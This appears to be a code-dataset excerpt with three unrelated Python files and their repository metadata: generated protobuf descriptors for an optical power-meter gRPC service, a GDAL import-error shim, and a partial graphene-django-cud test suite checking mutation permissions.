_GETAUTORANGEREQUEST = _descriptor.Descriptor(
name='GetAutorangeRequest',
full_name='instrosetta.interfaces.light_analysis.power_meter.v1.GetAutorangeRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.GetAutorangeRequest.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='units', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.GetAutorangeRequest.units', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1466,
serialized_end=1516,
)
_GETAUTORANGERESPONSE = _descriptor.Descriptor(
name='GetAutorangeResponse',
full_name='instrosetta.interfaces.light_analysis.power_meter.v1.GetAutorangeResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.GetAutorangeResponse.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='magnitude', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.GetAutorangeResponse.magnitude', index=1,
number=2, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='units', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.GetAutorangeResponse.units', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1518,
serialized_end=1588,
)
_SETAUTORANGEREQUEST = _descriptor.Descriptor(
name='SetAutorangeRequest',
full_name='instrosetta.interfaces.light_analysis.power_meter.v1.SetAutorangeRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.SetAutorangeRequest.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='magnitude', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.SetAutorangeRequest.magnitude', index=1,
number=2, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='units', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.SetAutorangeRequest.units', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1590,
serialized_end=1659,
)
_SETAUTORANGERESPONSE = _descriptor.Descriptor(
name='SetAutorangeResponse',
full_name='instrosetta.interfaces.light_analysis.power_meter.v1.SetAutorangeResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.SetAutorangeResponse.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='magnitude', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.SetAutorangeResponse.magnitude', index=1,
number=2, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='units', full_name='instrosetta.interfaces.light_analysis.power_meter.v1.SetAutorangeResponse.units', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1661,
serialized_end=1731,
)
_INITIALIZEREQUEST_PROPERTIESENTRY.containing_type = _INITIALIZEREQUEST
_INITIALIZEREQUEST.fields_by_name['properties'].message_type = _INITIALIZEREQUEST_PROPERTIESENTRY
DESCRIPTOR.message_types_by_name['InitializeRequest'] = _INITIALIZEREQUEST
DESCRIPTOR.message_types_by_name['InitializeResponse'] = _INITIALIZERESPONSE
DESCRIPTOR.message_types_by_name['ShutdownRequest'] = _SHUTDOWNREQUEST
DESCRIPTOR.message_types_by_name['ShutdownResponse'] = _SHUTDOWNRESPONSE
DESCRIPTOR.message_types_by_name['GetPowerRequest'] = _GETPOWERREQUEST
DESCRIPTOR.message_types_by_name['GetPowerResponse'] = _GETPOWERRESPONSE
DESCRIPTOR.message_types_by_name['SetPowerRequest'] = _SETPOWERREQUEST
DESCRIPTOR.message_types_by_name['SetPowerResponse'] = _SETPOWERRESPONSE
DESCRIPTOR.message_types_by_name['GetCountRequest'] = _GETCOUNTREQUEST
DESCRIPTOR.message_types_by_name['GetCountResponse'] = _GETCOUNTRESPONSE
DESCRIPTOR.message_types_by_name['SetCountRequest'] = _SETCOUNTREQUEST
DESCRIPTOR.message_types_by_name['SetCountResponse'] = _SETCOUNTRESPONSE
DESCRIPTOR.message_types_by_name['GetWavelengthRequest'] = _GETWAVELENGTHREQUEST
DESCRIPTOR.message_types_by_name['GetWavelengthResponse'] = _GETWAVELENGTHRESPONSE
DESCRIPTOR.message_types_by_name['SetWavelengthRequest'] = _SETWAVELENGTHREQUEST
DESCRIPTOR.message_types_by_name['SetWavelengthResponse'] = _SETWAVELENGTHRESPONSE
DESCRIPTOR.message_types_by_name['GetModeRequest'] = _GETMODEREQUEST
DESCRIPTOR.message_types_by_name['GetModeResponse'] = _GETMODERESPONSE
DESCRIPTOR.message_types_by_name['SetModeRequest'] = _SETMODEREQUEST
DESCRIPTOR.message_types_by_name['SetModeResponse'] = _SETMODERESPONSE
DESCRIPTOR.message_types_by_name['GetAutorangeRequest'] = _GETAUTORANGEREQUEST
DESCRIPTOR.message_types_by_name['GetAutorangeResponse'] = _GETAUTORANGERESPONSE
DESCRIPTOR.message_types_by_name['SetAutorangeRequest'] = _SETAUTORANGEREQUEST
DESCRIPTOR.message_types_by_name['SetAutorangeResponse'] = _SETAUTORANGERESPONSE
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
InitializeRequest = _reflection.GeneratedProtocolMessageType('InitializeRequest', (_message.Message,), dict(
PropertiesEntry = _reflection.GeneratedProtocolMessageType('PropertiesEntry', (_message.Message,), dict(
DESCRIPTOR = _INITIALIZEREQUEST_PROPERTIESENTRY,
__module__ = 'instrosetta.interfaces.light_analysis.power_meter_pb2'
# @@protoc_insertion_point(class_scope:instrosetta.interfaces.light_analysis.power_meter.v1.InitializeRequest.PropertiesEntry)
))
,
DESCRIPTOR = _INITIALIZEREQUEST,
__module__ = 'instrosetta.interfaces.light_analysis.power_meter_pb2'
# @@protoc_insertion_point(class_scope:instrosetta.interfaces.light_analysis.power_meter.v1.InitializeRequest)
))
_sym_db.RegisterMessage(InitializeRequest)
_sym_db.RegisterMessage(InitializeRequest.PropertiesEntry)
InitializeResponse = _reflection.GeneratedProtocolMessageType('InitializeResponse', (_message.Message,), dict(
DESCRIPTOR = _INITIALIZERESPONSE,
__module__ = 'instrosetta.interfaces.light_analysis.power_meter_pb2'
# @@protoc_insertion_point(class_scope:instrosetta.interfaces.light_analysis.power_meter.v1.InitializeResponse)
))
_sym_db.RegisterMessage(InitializeResponse)
ShutdownRequest = _reflection.GeneratedProtocolMessageType('ShutdownRequest', (_message.Message,), dict(
DESCRIPTOR = _SHUTDOWNREQUEST,
__module__ = 'instrosetta.interfaces.light_analysis.power_meter_pb2'
# @@protoc_insertion_point(class_scope:instrosetta.interfaces.light_analysis.power_meter.v1.ShutdownRequest)
))
_sym_db.RegisterMessage(ShutdownRequest)
ShutdownResponse = _reflection.GeneratedProtocolMessageType('ShutdownResponse', (_message.Message,), dict(
DESCRIPTOR = _SHUTDOWNRESPONSE,
__module__ = 'instrosetta.interfaces.light_analysis.power_meter_pb2'
# @@protoc_insertion_point(class_scope:instrosetta.interfaces.light_analysis.power_meter.v1.ShutdownResponse)
))
_sym_db.RegisterMessage(ShutdownResponse)
GetPowerRequest = _reflection.GeneratedProtocolMessageType('GetPowerRequest', (_message.Message,), dict(
DESCRIPTOR = _GETPOWERREQUEST,
__module__ = 'instrosetta.interfaces.light_analysis.power_meter_pb2'
# @@protoc_insertion_point(class_scope:instrosetta.interfaces.light_analysis.power_meter.v1.GetPowerRequest)
))
_sym_db.RegisterMessage(GetPowerRequest)
GetPowerResponse = _reflection.GeneratedProtocolMessageType('GetPowerResponse', (_message.Message,), dict(
DESCRIPTOR = _GETPOWERRESPONSE,
__module__ = 'instrosetta.interfaces.light_analysis.power_meter_pb2'
# @@protoc_insertion_point(class_scope:instrosetta.interfaces.light_analysis.power_meter.v1.GetPowerResponse)
))
_sym_db.RegisterMessage(GetPowerResponse)
SetPowerRequest = _reflection.GeneratedProtocolMessageType('SetPowerRequest', (_message.Message,), dict(
DESCRIPTOR = _SETPOWERREQUEST,
__module__ = 'instrosetta.interfaces.light_analysis.power_meter_pb2'
# @@protoc_insertion_point(class_scope:instrosetta.interfaces.light_analysis.power_meter.v1.SetPowerRequest)
))
_sym_db.RegisterMessage(SetPowerRequest)
SetPowerResponse = _reflection.GeneratedProtocolMessageType('SetPowerResponse', (_message.Message,), dict(
DESCRIPTOR = _SETPOWERRESPONSE,
__module__ = 'instrosetta.interfaces.light_analysis.power_meter_pb2'
# @@protoc_insertion_point(class_scope:instrosetta.interfaces.light_analysis.power_meter.v1.SetPowerResponse)
))
_sym_db.RegisterMessage(SetPowerResponse)
GetCountRequest = _reflection.GeneratedProtocolMessageType('GetCountRequest', (_message.Message,), dict(
DESCRIPTOR = _GETCOUNTREQUEST,
__module__ = 'instrosetta.interfaces.light_analysis.power_meter_pb2'
# @@protoc_insertion_point(class_scope:instrosetta.interfaces.light_analysis.power_meter.v1.GetCountRequest)
))
_sym_db.RegisterMessage(GetCountRequest)
GetCountResponse = _reflection.GeneratedProtocolMessageType('GetCountResponse', (_message.Message,), dict(
DESCRIPTOR = _GETCOUNTRESPONSE,
__module__ = 'instrosetta.interfaces.light_analysis.power_meter_pb2'
# @@protoc_insertion_point(class_scope:instrosetta.interfaces.light_analysis.power_meter.v1.GetCountResponse)
))
_sym_db.RegisterMessage(GetCountResponse)
SetCountRequest = _reflection.GeneratedProtocolMessageType('SetCountRequest', (_message.Message,), dict(
DESCRIPTOR = _SETCOUNTREQUEST,
__module__ = 'instrosetta.interfaces.light_analysis.power_meter_pb2'
# @@protoc_insertion_point(class_scope:instrosetta.interfaces.light_analysis.power_meter.v1.SetCountRequest)
))
_sym_db.RegisterMessage(SetCountRequest)
SetCountResponse = _reflection.GeneratedProtocolMessageType('SetCountResponse', (_message.Message,), dict(
DESCRIPTOR = _SETCOUNTRESPONSE,
__module__ = 'instrosetta.interfaces.light_analysis.power_meter_pb2'
# @@protoc_insertion_point(class_scope:instrosetta.interfaces.light_analysis.power_meter.v1.SetCountResponse)
))
_sym_db.RegisterMessage(SetCountResponse)
GetWavelengthRequest = _reflection.GeneratedProtocolMessageType('GetWavelengthRequest', (_message.Message,), dict(
DESCRIPTOR = _GETWAVELENGTHREQUEST,
__module__ = 'instrosetta.interfaces.light_analysis.power_meter_pb2'
# @@protoc_insertion_point(class_scope:instrosetta.interfaces.light_analysis.power_meter.v1.GetWavelengthRequest)
))
_sym_db.RegisterMessage(GetWavelengthRequest)
GetWavelengthResponse = _reflection.GeneratedProtocolMessageType('GetWavelengthResponse', (_message.Message,), dict(
DESCRIPTOR = _GETWAVELENGTHRESPONSE,
__module__ = 'instrosetta.interfaces.light_analysis.power_meter_pb2'
# @@protoc_insertion_point(class_scope:instrosetta.interfaces.light_analysis.power_meter.v1.GetWavelengthResponse)
))
_sym_db.RegisterMessage(GetWavelengthResponse)
SetWavelengthRequest = _reflection.GeneratedProtocolMessageType('SetWavelengthRequest', (_message.Message,), dict(
DESCRIPTOR = _SETWAVELENGTHREQUEST,
__module__ = 'instrosetta.interfaces.light_analysis.power_meter_pb2'
# @@protoc_insertion_point(class_scope:instrosetta.interfaces.light_analysis.power_meter.v1.SetWavelengthRequest)
))
_sym_db.RegisterMessage(SetWavelengthRequest)
SetWavelengthResponse = _reflection.GeneratedProtocolMessageType('SetWavelengthResponse', (_message.Message,), dict(
DESCRIPTOR = _SETWAVELENGTHRESPONSE,
__module__ = 'instrosetta.interfaces.light_analysis.power_meter_pb2'
# @@protoc_insertion_point(class_scope:instrosetta.interfaces.light_analysis.power_meter.v1.SetWavelengthResponse)
))
_sym_db.RegisterMessage(SetWavelengthResponse)
GetModeRequest = _reflection.GeneratedProtocolMessageType('GetModeRequest', (_message.Message,), dict(
DESCRIPTOR = _GETMODEREQUEST,
__module__ = 'instrosetta.interfaces.light_analysis.power_meter_pb2'
# @@protoc_insertion_point(class_scope:instrosetta.interfaces.light_analysis.power_meter.v1.GetModeRequest)
))
_sym_db.RegisterMessage(GetModeRequest)
GetModeResponse = _reflection.GeneratedProtocolMessageType('GetModeResponse', (_message.Message,), dict(
DESCRIPTOR = _GETMODERESPONSE,
__module__ = 'instrosetta.interfaces.light_analysis.power_meter_pb2'
# @@protoc_insertion_point(class_scope:instrosetta.interfaces.light_analysis.power_meter.v1.GetModeResponse)
))
_sym_db.RegisterMessage(GetModeResponse)
SetModeRequest = _reflection.GeneratedProtocolMessageType('SetModeRequest', (_message.Message,), dict(
DESCRIPTOR = _SETMODEREQUEST,
__module__ = 'instrosetta.interfaces.light_analysis.power_meter_pb2'
# @@protoc_insertion_point(class_scope:instrosetta.interfaces.light_analysis.power_meter.v1.SetModeRequest)
))
_sym_db.RegisterMessage(SetModeRequest)
SetModeResponse = _reflection.GeneratedProtocolMessageType('SetModeResponse', (_message.Message,), dict(
DESCRIPTOR = _SETMODERESPONSE,
__module__ = 'instrosetta.interfaces.light_analysis.power_meter_pb2'
# @@protoc_insertion_point(class_scope:instrosetta.interfaces.light_analysis.power_meter.v1.SetModeResponse)
))
_sym_db.RegisterMessage(SetModeResponse)
GetAutorangeRequest = _reflection.GeneratedProtocolMessageType('GetAutorangeRequest', (_message.Message,), dict(
DESCRIPTOR = _GETAUTORANGEREQUEST,
__module__ = 'instrosetta.interfaces.light_analysis.power_meter_pb2'
# @@protoc_insertion_point(class_scope:instrosetta.interfaces.light_analysis.power_meter.v1.GetAutorangeRequest)
))
_sym_db.RegisterMessage(GetAutorangeRequest)
GetAutorangeResponse = _reflection.GeneratedProtocolMessageType('GetAutorangeResponse', (_message.Message,), dict(
DESCRIPTOR = _GETAUTORANGERESPONSE,
__module__ = 'instrosetta.interfaces.light_analysis.power_meter_pb2'
# @@protoc_insertion_point(class_scope:instrosetta.interfaces.light_analysis.power_meter.v1.GetAutorangeResponse)
))
_sym_db.RegisterMessage(GetAutorangeResponse)
SetAutorangeRequest = _reflection.GeneratedProtocolMessageType('SetAutorangeRequest', (_message.Message,), dict(
DESCRIPTOR = _SETAUTORANGEREQUEST,
__module__ = 'instrosetta.interfaces.light_analysis.power_meter_pb2'
# @@protoc_insertion_point(class_scope:instrosetta.interfaces.light_analysis.power_meter.v1.SetAutorangeRequest)
))
_sym_db.RegisterMessage(SetAutorangeRequest)
SetAutorangeResponse = _reflection.GeneratedProtocolMessageType('SetAutorangeResponse', (_message.Message,), dict(
DESCRIPTOR = _SETAUTORANGERESPONSE,
__module__ = 'instrosetta.interfaces.light_analysis.power_meter_pb2'
# @@protoc_insertion_point(class_scope:instrosetta.interfaces.light_analysis.power_meter.v1.SetAutorangeResponse)
))
_sym_db.RegisterMessage(SetAutorangeResponse)
_INITIALIZEREQUEST_PROPERTIESENTRY._options = None
_POWERMETER = _descriptor.ServiceDescriptor(
name='PowerMeter',
full_name='instrosetta.interfaces.light_analysis.power_meter.v1.PowerMeter',
file=DESCRIPTOR,
index=0,
serialized_options=None,
serialized_start=1734,
serialized_end=3696,
methods=[
_descriptor.MethodDescriptor(
name='Initialize',
full_name='instrosetta.interfaces.light_analysis.power_meter.v1.PowerMeter.Initialize',
index=0,
containing_service=None,
input_type=_INITIALIZEREQUEST,
output_type=_INITIALIZERESPONSE,
serialized_options=None,
),
_descriptor.MethodDescriptor(
name='Shutdown',
full_name='instrosetta.interfaces.light_analysis.power_meter.v1.PowerMeter.Shutdown',
index=1,
containing_service=None,
input_type=_SHUTDOWNREQUEST,
output_type=_SHUTDOWNRESPONSE,
serialized_options=None,
),
_descriptor.MethodDescriptor(
name='GetPower',
full_name='instrosetta.interfaces.light_analysis.power_meter.v1.PowerMeter.GetPower',
index=2,
containing_service=None,
input_type=_GETPOWERREQUEST,
output_type=_GETPOWERRESPONSE,
serialized_options=None,
),
_descriptor.MethodDescriptor(
name='SetPower',
full_name='instrosetta.interfaces.light_analysis.power_meter.v1.PowerMeter.SetPower',
index=3,
containing_service=None,
input_type=_SETPOWERREQUEST,
output_type=_SETPOWERRESPONSE,
serialized_options=None,
),
_descriptor.MethodDescriptor(
name='GetCount',
full_name='instrosetta.interfaces.light_analysis.power_meter.v1.PowerMeter.GetCount',
index=4,
containing_service=None,
input_type=_GETCOUNTREQUEST,
output_type=_GETCOUNTRESPONSE,
serialized_options=None,
),
_descriptor.MethodDescriptor(
name='SetCount',
full_name='instrosetta.interfaces.light_analysis.power_meter.v1.PowerMeter.SetCount',
index=5,
containing_service=None,
input_type=_SETCOUNTREQUEST,
output_type=_SETCOUNTRESPONSE,
serialized_options=None,
),
_descriptor.MethodDescriptor(
name='GetWavelength',
full_name='instrosetta.interfaces.light_analysis.power_meter.v1.PowerMeter.GetWavelength',
index=6,
containing_service=None,
input_type=_GETWAVELENGTHREQUEST,
output_type=_GETWAVELENGTHRESPONSE,
serialized_options=None,
),
_descriptor.MethodDescriptor(
name='SetWavelength',
full_name='instrosetta.interfaces.light_analysis.power_meter.v1.PowerMeter.SetWavelength',
index=7,
containing_service=None,
input_type=_SETWAVELENGTHREQUEST,
output_type=_SETWAVELENGTHRESPONSE,
serialized_options=None,
),
_descriptor.MethodDescriptor(
name='GetMode',
full_name='instrosetta.interfaces.light_analysis.power_meter.v1.PowerMeter.GetMode',
index=8,
containing_service=None,
input_type=_GETMODEREQUEST,
output_type=_GETMODERESPONSE,
serialized_options=None,
),
_descriptor.MethodDescriptor(
name='SetMode',
full_name='instrosetta.interfaces.light_analysis.power_meter.v1.PowerMeter.SetMode',
index=9,
containing_service=None,
input_type=_SETMODEREQUEST,
output_type=_SETMODERESPONSE,
serialized_options=None,
),
_descriptor.MethodDescriptor(
name='GetAutorange',
full_name='instrosetta.interfaces.light_analysis.power_meter.v1.PowerMeter.GetAutorange',
index=10,
containing_service=None,
input_type=_GETAUTORANGEREQUEST,
output_type=_GETAUTORANGERESPONSE,
serialized_options=None,
),
_descriptor.MethodDescriptor(
name='SetAutorange',
full_name='instrosetta.interfaces.light_analysis.power_meter.v1.PowerMeter.SetAutorange',
index=11,
containing_service=None,
input_type=_SETAUTORANGEREQUEST,
output_type=_SETAUTORANGERESPONSE,
serialized_options=None,
),
])
_sym_db.RegisterServiceDescriptor(_POWERMETER)
DESCRIPTOR.services_by_name['PowerMeter'] = _POWERMETER
# @@protoc_insertion_point(module_scope)
| 42.865385
| 5,449
| 0.766994
| 7,133
| 60,183
| 6.187719
| 0.041217
| 0.039332
| 0.094841
| 0.115459
| 0.789428
| 0.760745
| 0.745656
| 0.741963
| 0.711625
| 0.693024
| 0
| 0.032234
| 0.110795
| 60,183
| 1,403
| 5,450
| 42.895937
| 0.792525
| 0.048751
| 0
| 0.688958
| 1
| 0.000778
| 0.291389
| 0.254758
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.003888
| 0
| 0.003888
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
853ba7fcb50055e5c0c7cda38cf013a0abf3f59a
| 190
|
py
|
Python
|
swig/python/osgeo/utils.py
|
FeU-aKlos/gdal
|
bba6781133815248c9329842d365f8812b74c33f
|
[
"Apache-2.0"
] | 3,100
|
2015-01-02T10:33:40.000Z
|
2022-03-31T02:06:51.000Z
|
swig/python/osgeo/utils.py
|
FeU-aKlos/gdal
|
bba6781133815248c9329842d365f8812b74c33f
|
[
"Apache-2.0"
] | 3,496
|
2015-01-06T16:53:30.000Z
|
2022-03-31T20:18:51.000Z
|
swig/python/osgeo/utils.py
|
FeU-aKlos/gdal
|
bba6781133815248c9329842d365f8812b74c33f
|
[
"Apache-2.0"
] | 2,036
|
2015-01-08T20:22:12.000Z
|
2022-03-31T10:24:08.000Z
|
raise ImportError("Please use `import osgeo_utils` (GDAL >= 3.3) "
"instead of `import osgeo.utils` (GDAL == 3.2). "
"For more details see GDAL RFC #78")
| 47.5
| 67
| 0.552632
| 25
| 190
| 4.16
| 0.72
| 0.211538
| 0.307692
| 0.384615
| 0.403846
| 0
| 0
| 0
| 0
| 0
| 0
| 0.046154
| 0.315789
| 190
| 3
| 68
| 63.333333
| 0.753846
| 0
| 0
| 0
| 0
| 0
| 0.663158
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 9
|
857ddc5437f40dad5e3975e2c162273720f4f681
| 63,016
|
py
|
Python
|
graphene_django_cud/tests/test_mutations.py
|
janosroden/graphene-django-cud
|
5a77f874e880a30f0941a0bc016188b9b0f892ad
|
[
"MIT"
] | null | null | null |
graphene_django_cud/tests/test_mutations.py
|
janosroden/graphene-django-cud
|
5a77f874e880a30f0941a0bc016188b9b0f892ad
|
[
"MIT"
] | null | null | null |
graphene_django_cud/tests/test_mutations.py
|
janosroden/graphene-django-cud
|
5a77f874e880a30f0941a0bc016188b9b0f892ad
|
[
"MIT"
] | null | null | null |
import graphene
from addict import Dict
from django.test import TestCase
from graphene import Schema
from graphql import ResolveInfo
from graphql_relay import to_global_id
from graphene_django_cud.mutations import DjangoUpdateMutation, DjangoCreateMutation
from graphene_django_cud.tests.factories import (
UserFactory,
CatFactory,
UserWithPermissionsFactory,
DogFactory,
MouseFactory,
)
from graphene_django_cud.tests.models import User, Cat, Dog, DogRegistration
from graphene_django_cud.util import disambiguate_id
def mock_info(context=None):
return ResolveInfo(
None,
None,
None,
None,
schema=None,
fragments=None,
root_value=None,
operation=None,
variable_values=None,
context=context,
)
class TestUpdateMutation(TestCase):
def test__model_registered__does_not_raise_error(self):
# This registers the UserNode type
# noinspection PyUnresolvedReferences
from .schema import UserNode
class UpdateMutation(DjangoUpdateMutation):
class Meta:
model = User
def test_permissions__user_has_no_permission__returns_error(self):
# This registers the UserNode type
# noinspection PyUnresolvedReferences
from .schema import UserNode
class UpdateCatMutation(DjangoUpdateMutation):
class Meta:
model = Cat
permissions = ("tests.change_cat",)
class Mutations(graphene.ObjectType):
update_cat = UpdateCatMutation.Field()
user = UserFactory.create()
cat = CatFactory.create()
schema = Schema(mutation=Mutations)
mutation = """
mutation UpdateCat(
$id: ID!,
$input: UpdateCatInput!
){
updateCat(id: $id, input: $input){
cat{
id
}
}
}
"""
result = schema.execute(
mutation,
variables={
"id": to_global_id("UserNode", user.id),
"input": {"name": "Name", "owner": to_global_id("UserNode", user.id)},
},
context=Dict(user=user),
)
self.assertEqual(len(result.errors), 1)
def test_permissions__user_has_permission__does_not_return_error(self):
# This registers the UserNode type
# noinspection PyUnresolvedReferences
from .schema import UserNode
class UpdateCatMutation(DjangoUpdateMutation):
class Meta:
model = Cat
permissions = ("tests.change_cat",)
class Mutations(graphene.ObjectType):
update_cat = UpdateCatMutation.Field()
user = UserWithPermissionsFactory.create(permissions=["tests.change_cat"])
cat = CatFactory.create()
schema = Schema(mutation=Mutations)
mutation = """
mutation UpdateCat(
$id: ID!,
$input: UpdateCatInput!
){
updateCat(id: $id, input: $input){
cat{
id
}
}
}
"""
result = schema.execute(
mutation,
variables={
"id": to_global_id("UserNode", user.id),
"input": {"name": "Name", "owner": to_global_id("UserNode", user.id)},
},
context=Dict(user=user),
)
self.assertIsNone(result.errors)
def test_get_permissions__empty_list__overrides_and_grants_access(self):
# This registers the UserNode type
# noinspection PyUnresolvedReferences
from .schema import UserNode
class UpdateCatMutation(DjangoUpdateMutation):
class Meta:
model = Cat
# This will be overridden
permissions = ("tests.change_cat",)
@classmethod
def get_permissions(cls, root, info, *args, **kwargs):
return []
class Mutations(graphene.ObjectType):
update_cat = UpdateCatMutation.Field()
user = UserFactory.create()
cat = CatFactory.create()
schema = Schema(mutation=Mutations)
mutation = """
mutation UpdateCat(
$id: ID!,
$input: UpdateCatInput!
){
updateCat(id: $id, input: $input){
cat{
id
}
}
}
"""
result = schema.execute(
mutation,
variables={
"id": to_global_id("UserNode", user.id),
"input": {"name": "Name", "owner": to_global_id("UserNode", user.id)},
},
context=Dict(user=user),
)
self.assertIsNone(result.errors)
def test_get_permissions__list_with_permissions__requires_returned_permissions(
self,
):
# This registers the UserNode type
# noinspection PyUnresolvedReferences
from .schema import UserNode
class UpdateCatMutation(DjangoUpdateMutation):
class Meta:
model = Cat
@classmethod
def get_permissions(cls, root, info, *args, **kwargs):
return ["tests.change_cat"]
class Mutations(graphene.ObjectType):
update_cat = UpdateCatMutation.Field()
user = UserFactory.create()
user_with_permissions = UserWithPermissionsFactory.create(
permissions=["tests.change_cat"]
)
cat = CatFactory.create()
schema = Schema(mutation=Mutations)
mutation = """
mutation UpdateCat(
$id: ID!,
$input: UpdateCatInput!
){
updateCat(id: $id, input: $input){
cat{
id
}
}
}
"""
result = schema.execute(
mutation,
variables={
"id": to_global_id("UserNode", user.id),
"input": {"name": "Name", "owner": to_global_id("UserNode", user.id)},
},
context=Dict(user=user),
)
self.assertEqual(len(result.errors), 1)
result = schema.execute(
mutation,
variables={
"id": to_global_id("UserNode", user.id),
"input": {"name": "Name", "owner": to_global_id("UserNode", user.id)},
},
context=Dict(user=user_with_permissions),
)
self.assertIsNone(result.errors)
def test_get_permissions__conditional_list__requires_returned_permissions(self):
# This registers the UserNode type
# noinspection PyUnresolvedReferences
from .schema import UserNode
class UpdateCatMutation(DjangoUpdateMutation):
class Meta:
model = Cat
@classmethod
def get_permissions(cls, root, info, input, id, *args, **kwargs):
owner_id = int(disambiguate_id(input["owner"]))
if info.context.user.id == owner_id:
return []
return ["tests.change_cat"]
class Mutations(graphene.ObjectType):
update_cat = UpdateCatMutation.Field()
user = UserFactory.create()
new_cat_owner = UserFactory.create()
cat = CatFactory.create()
schema = Schema(mutation=Mutations)
mutation = """
mutation UpdateCat(
$id: ID!,
$input: UpdateCatInput!
){
updateCat(id: $id, input: $input){
cat{
id
}
}
}
"""
result = schema.execute(
mutation,
variables={
"id": to_global_id("CatNode", cat.id),
"input": {
"name": "Name",
"owner": to_global_id("UserNode", new_cat_owner.id),
},
},
context=Dict(user=user),
)
self.assertEqual(len(result.errors), 1)
result = schema.execute(
mutation,
variables={
"id": to_global_id("CatNode", cat.id),
"input": {
"name": "Name",
"owner": to_global_id("UserNode", new_cat_owner.id),
},
},
context=Dict(user=new_cat_owner),
)
self.assertIsNone(result.errors)
def test_check_permissions__override__uses_new_check_permissions_to_grant_access(
self,
):
# This registers the UserNode type
# noinspection PyUnresolvedReferences
from .schema import UserNode
class UpdateCatMutation(DjangoUpdateMutation):
class Meta:
model = Cat
# This will be overridden
permissions = ("tests.change_cat",)
@classmethod
def check_permissions(cls, root, info, input, id, obj) -> None:
if input["name"] == "Name 2":
raise ValueError("Cannot be Name 2")
return None
class Mutations(graphene.ObjectType):
update_cat = UpdateCatMutation.Field()
user = UserFactory.create()
cat = CatFactory.create()
schema = Schema(mutation=Mutations)
mutation = """
